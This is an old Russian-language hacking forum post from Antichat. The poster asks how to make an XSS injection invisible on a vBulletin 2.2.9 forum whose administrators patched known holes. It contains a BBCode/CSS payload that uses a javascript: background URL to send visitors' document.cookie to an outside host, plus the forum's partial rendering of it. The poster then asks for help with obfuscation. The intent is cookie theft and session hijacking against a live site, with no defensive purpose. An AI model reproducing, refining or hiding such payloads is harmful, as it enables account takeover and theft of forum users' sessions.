Форум АНТИЧАТ - Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

16.01.2006, 17:48

ПсиХ

Новичок

Регистрация: 13.01.2006

Сообщений: 8

Провел на форуме:
37195

Репутация: 2

Отправить сообщение для ПсиХ с помощью ICQ

Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

Есть форум vBulletin 2.2.9
Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры).

Пробовал множество инъекций в сообщениях, но они все видны или видны на половину

Пример:

Вставлял:

Код HTML:

[url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum  ent.images[1].src="http://antichat.ru/cgi-bin/s.jp  g?"+document.cookie,) ]wj[/url][/url]

Форум выводил:

Код HTML:

[url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url]

как раз то что должно быть скрыто он и выводит!

Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было.

Заранее спасибо.